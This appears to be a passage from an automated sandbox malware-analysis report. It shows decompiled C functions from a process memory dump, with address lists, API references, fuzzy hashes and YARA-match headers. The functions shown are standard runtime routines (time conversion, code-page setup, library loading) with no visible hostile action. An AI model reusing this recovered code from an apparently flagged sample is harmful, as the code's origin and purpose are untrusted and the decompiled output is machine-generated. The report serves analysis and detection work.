                                    0x004503ef
                                    0x004503f2
                                    0x00000000
                                    0x00000000
                                    0x004503fc
                                    0x00450402
                                    0x00450404
                                    0x00000000
                                    0x00000000
                                    0x0045040b
                                    0x00450411
                                    0x0045041e
                                    0x00000000
                                    0x0045041e
                                    0x004503d9
                                    0x004503db
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004503db
                                    0x004502fb
                                    0x00450305
                                    0x00450311
                                    0x00450314
                                    0x00450315
                                    0x00450317
                                    0x00450335
                                    0x00450338
                                    0x0045033b
                                    0x0045033c
                                    0x0045033c
                                    0x0045033e
                                    0x00450351
                                    0x00450351
                                    0x00450353
                                    0x00450356
                                    0x0045035b
                                    0x0045035e
                                    0x00450361
                                    0x004503ac
                                    0x004503b1
                                    0x004503b4
                                    0x004503bb
                                    0x004503bb
                                    0x004503c1
                                    0x004503c1
                                    0x004503c9
                                    0x004503cf
                                    0x00000000
                                    0x004503cf
                                    0x00450363
                                    0x00450364
                                    0x00450366
                                    0x00450369
                                    0x0045036b
                                    0x0045036e
                                    0x00450370
                                    0x0045034a
                                    0x0045034a
                                    0x00000000
                                    0x0045034a
                                    0x00450372
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00450372
                                    0x00450340
                                    0x00000000
                                    0x00000000
                                    0x00450342
                                    0x00450348
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00450374
                                    0x00450374
                                    0x00450374
                                    0x0045037c
                                    0x00450382
                                    0x00450387
                                    0x0045038a
                                    0x0045038a
                                    0x00000000
                                    0x0045038a
                                    0x0045031e
                                    0x00000000
                                    0x0045031e
                                    0x004502fd
                                    0x004502ff
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004502ff
                                    0x004502c5
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
                                    • Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
                                    • Opcode Fuzzy Hash: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
                                    • Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043C481, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E0043C481(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = L0043C5CE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = L00450BC0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591d8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x4591a4;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = L00450BC0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = L00450BC0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = L00450BC0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = L0043A504();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = L0043A504();
					_t102 = 0x16;
					 *_t69 = _t102;
					L0043695D();
					goto L11;
				}
				_t71 = L0043A504();
				_t103 = 0x16;
				 *_t71 = _t103;
				L0043695D();
				return _t103;
			}
































                                    0x0043c48a
                                    0x0043c48f
                                    0x0043c4af
                                    0x0043c4b0
                                    0x0043c4b2
                                    0x0043c4b5
                                    0x0043c4b7
                                    0x0043c4ca
                                    0x0043c4cd
                                    0x0043c4cf
                                    0x0043c4d2
                                    0x0043c4d5
                                    0x0043c4d8
                                    0x0043c4e3
                                    0x0043c4e5
                                    0x0043c4e6
                                    0x0043c4e8
                                    0x0043c504
                                    0x0043c508
                                    0x0043c511
                                    0x0043c516
                                    0x0043c51d
                                    0x0043c52a
                                    0x0043c52f
                                    0x0043c539
                                    0x0043c53e
                                    0x0043c543
                                    0x0043c545
                                    0x0043c54c
                                    0x0043c54e
                                    0x0043c54e
                                    0x0043c553
                                    0x0043c558
                                    0x0043c559
                                    0x0043c55c
                                    0x0043c564
                                    0x0043c564
                                    0x0043c565
                                    0x0043c573
                                    0x0043c57b
                                    0x0043c588
                                    0x0043c589
                                    0x0043c593
                                    0x0043c599
                                    0x0043c5a3
                                    0x0043c5aa
                                    0x0043c5ae
                                    0x0043c5b2
                                    0x0043c5b7
                                    0x0043c5bb
                                    0x0043c5c3
                                    0x0043c5c3
                                    0x0043c5c5
                                    0x0043c5c8
                                    0x00000000
                                    0x0043c55e
                                    0x0043c55e
                                    0x0043c55e
                                    0x0043c55f
                                    0x0043c55f
                                    0x00000000
                                    0x0043c55e
                                    0x0043c55c
                                    0x0043c4ea
                                    0x0043c4f3
                                    0x0043c4f3
                                    0x0043c4fa
                                    0x0043c4fb
                                    0x0043c4fd
                                    0x0043c4fd
                                    0x00000000
                                    0x0043c4fd
                                    0x0043c4ec
                                    0x0043c4f1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043c4f1
                                    0x0043c4da
                                    0x00000000
                                    0x00000000
                                    0x0043c4dc
                                    0x0043c4e1
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0043c4e1
                                    0x0043c4b9
                                    0x0043c4c0
                                    0x0043c4c1
                                    0x0043c4c3
                                    0x00000000
                                    0x0043c4c3
                                    0x0043c491
                                    0x0043c498
                                    0x0043c499
                                    0x0043c49b
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                                    • Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
                                    • Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
                                    • Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043D288, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E0043D288(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46b4d4; // 0x337edc0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0043F348(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004401F5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									L00447D3F();
									E004401F5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                    0x0043d288
                                    0x0043d28b
                                    0x0043d293
                                    0x0043d29c
                                    0x0043d2f1
                                    0x0043d2aa
                                    0x0043d2b0
                                    0x0043d2b4
                                    0x0043d302
                                    0x0043d302
                                    0x0043d2b6
                                    0x0043d2be
                                    0x0043d2c1
                                    0x0043d2c4
                                    0x0043d2fb
                                    0x0043d2fc
                                    0x00000000
                                    0x0043d2c6
                                    0x0043d2d0
                                    0x0043d2dc
                                    0x00000000
                                    0x0043d2de
                                    0x0043d2de
                                    0x0043d2df
                                    0x0043d2e0
                                    0x0043d2e6
                                    0x0043d2eb
                                    0x0043d2ee
                                    0x00000000
                                    0x0043d2ee
                                    0x0043d2dc
                                    0x0043d2c4
                                    0x0043d2f7
                                    0x0043d2fa
                                    0x00000000
                                    0x0043d2fa
                                    0x0043d2f5
                                    0x00000000
                                    0x0043d295
                                    0x0043d299
                                    0x0043d299
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
                                    • Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
                                    • Opcode Fuzzy Hash: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
                                    • Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043D307, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E0043D307(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46b4d0; // 0x3369790
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0043F348(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004401F5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									L00447D4A(_t13);
									E004401F5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                    0x0043d307
                                    0x0043d30a
                                    0x0043d312
                                    0x0043d31b
                                    0x0043d36a
                                    0x0043d327
                                    0x0043d32d
                                    0x0043d331
                                    0x0043d37b
                                    0x0043d37b
                                    0x0043d333
                                    0x0043d33b
                                    0x0043d33e
                                    0x0043d341
                                    0x0043d374
                                    0x0043d375
                                    0x00000000
                                    0x0043d343
                                    0x0043d349
                                    0x0043d355
                                    0x00000000
                                    0x0043d357
                                    0x0043d357
                                    0x0043d358
                                    0x0043d359
                                    0x0043d35f
                                    0x0043d364
                                    0x0043d367
                                    0x00000000
                                    0x0043d367
                                    0x0043d355
                                    0x0043d341
                                    0x0043d370
                                    0x0043d373
                                    0x00000000
                                    0x0043d373
                                    0x0043d36e
                                    0x00000000
                                    0x0043d314
                                    0x0043d318
                                    0x0043d318
                                    0x00000000

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
                                    • Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
                                    • Opcode Fuzzy Hash: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
                                    • Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00442033, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E00442033(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x46b658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x458b78 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xbd45ae93
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                    0x00442038
                                    0x0044203c
                                    0x00442043
                                    0x00442047
                                    0x00442055
                                    0x0044206b
                                    0x0044206f
                                    0x00442098
                                    0x0044209a
                                    0x0044209e
                                    0x004420a1
                                    0x004420a1
                                    0x004420a7
                                    0x004420a9
                                    0x00000000
                                    0x004420aa
                                    0x00442071
                                    0x0044207a
                                    0x00442089
                                    0x0044207c
                                    0x0044207f
                                    0x00442085
                                    0x00442085
                                    0x0044208d
                                    0x00000000
                                    0x0044208f
                                    0x00442092
                                    0x00442094
                                    0x00000000
                                    0x00442094
                                    0x0044208d
                                    0x00442049
                                    0x0044204e
                                    0x00000000

                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
                                    • GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                                    • Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
                                    • Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
                                    • Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00447399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E00447399(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x46a00c; // 0xbd45ae92
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = L00446F6C(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x46a488)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x46a488)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t7 =  &_v28; // 0x44723a
										_t51 = GetCPInfo(_t78, _t7);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x46ba28 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												L00446FDF(_t98);
												goto L37;
											}
										} else {
											L00431F00(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = L00446F2E( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00447044(_t78, _t91, _t95, _t98, _t98);
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					L00431F00(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x46a498;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x46a480; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = L00446F2E(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x46a48c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					L00446FDF(_t98);
				}
				L39:
				return L0042FD1B(_v8 ^ _t99);
			}






























                                    0x004473a1
                                    0x004473a8
                                    0x004473b0
                                    0x004473b8
                                    0x004473bd
                                    0x004473ce
                                    0x004473ce
                                    0x004473d0
                                    0x004473d2
                                    0x004473d4
                                    0x004473d7
                                    0x004473d7
                                    0x004473dd
                                    0x00000000
                                    0x00000000
                                    0x004473e3
                                    0x004473e4
                                    0x004473e7
                                    0x004473ea
                                    0x004473ef
                                    0x00000000
                                    0x004473f1
                                    0x004473f1
                                    0x004473f7
                                    0x004474c5
                                    0x004473fd
                                    0x004473fd
                                    0x00447403
                                    0x00000000
                                    0x00447409
                                    0x0044740d
                                    0x00447413
                                    0x00447415
                                    0x00000000
                                    0x0044741b
                                    0x0044741b
                                    0x00447420
                                    0x00447426
                                    0x00447428
                                    0x004474b2
                                    0x004474b8
                                    0x00000000
                                    0x004474ba
                                    0x004474bb
                                    0x00000000
                                    0x004474bb
                                    0x0044742e
                                    0x00447438
                                    0x0044743d
                                    0x00447445
                                    0x0044744b
                                    0x0044744c
                                    0x0044744f
                                    0x004474a2
                                    0x00447451
                                    0x00447451
                                    0x00447455
                                    0x00447458
                                    0x0044745a
                                    0x0044745a
                                    0x0044745d
                                    0x0044745f
                                    0x00000000
                                    0x00000000
                                    0x00447461
                                    0x00447464
                                    0x0044746f
                                    0x0044746f
                                    0x00447471
                                    0x00000000
                                    0x00000000
                                    0x00447469
                                    0x0044746e
                                    0x0044746e
                                    0x0044746e
                                    0x00447473
                                    0x00447476
                                    0x00447479
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00447479
                                    0x0044745a
                                    0x0044747b
                                    0x0044747b
                                    0x0044747e
                                    0x00447483
                                    0x00447483
                                    0x00447486
                                    0x00447487
                                    0x00447487
                                    0x00447487
                                    0x00447497
                                    0x0044749d
                                    0x0044749d
                                    0x004474a7
                                    0x004474aa
                                    0x004474ab
                                    0x004474ac
                                    0x00447570
                                    0x00447571
                                    0x00447576
                                    0x00447577
                                    0x00447577
                                    0x00447428
                                    0x00447415
                                    0x00447403
                                    0x004473f7
                                    0x00000000
                                    0x00447579
                                    0x004474d7
                                    0x004474df
                                    0x004474df
                                    0x004474e3
                                    0x004474e6
                                    0x004474ec
                                    0x004474ef
                                    0x004474ef
                                    0x004474f2
                                    0x004474f4
                                    0x004474f6
                                    0x004474f6
                                    0x004474f9
                                    0x004474fb
                                    0x00000000
                                    0x00000000
                                    0x004474fd
                                    0x00447500
                                    0x0044751c
                                    0x0044751c
                                    0x0044751e
                                    0x00000000
                                    0x00000000
                                    0x00447505
                                    0x0044750b
                                    0x0044750d
                                    0x00447513
                                    0x00447517
                                    0x00447517
                                    0x00447518
                                    0x00000000
                                    0x00447518
                                    0x00000000
                                    0x0044750b
                                    0x00447520
                                    0x00447523
                                    0x00447526
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00447526
                                    0x00447528
                                    0x00447528
                                    0x0044752b
                                    0x0044752c
                                    0x0044752f
                                    0x00447532
                                    0x00447532
                                    0x00447538
                                    0x0044753b
                                    0x0044754a
                                    0x00447553
                                    0x00447558
                                    0x0044755e
                                    0x0044755f
                                    0x0044755f
                                    0x00447562
                                    0x00447565
                                    0x00447568
                                    0x0044756b
                                    0x0044756b
                                    0x0044756b
                                    0x00000000
                                    0x004473bf
                                    0x004473c0
                                    0x004473c6
                                    0x0044757a
                                    0x00447589

                                    APIs
                                      • Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
                                    • GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID: :rD
                                    • API String ID: 546120528-3120900009
                                    • Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                                    • Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
                                    • Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
                                    • Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00447044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 96%
                                    			E00447044(void* __ebx, signed int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed int _v1828;
				signed int _t63;
				void* _t67;
				signed int _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t86;
				char _t87;
				char _t90;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t96;
				char* _t97;
				intOrPtr _t101;
				signed int _t102;

				_t95 = __edx;
				_t63 =  *0x46a00c; // 0xbd45ae92
				_v8 = _t63 ^ _t102;
				_t2 =  &_a4; // 0x447576
				_t101 =  *_t2;
				if(GetCPInfo( *(_t101 + 4),  &_v1820) == 0) {
					_t96 = _t101 + 0x119;
					_t90 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t96;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t97 = _t96 + _t90;
						_t69 = _t68 + _t97;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t97 = 0;
							} else {
								_t72 = _t101 + _t90;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t90 - 0x20; // -32
								_t73 = _t59;
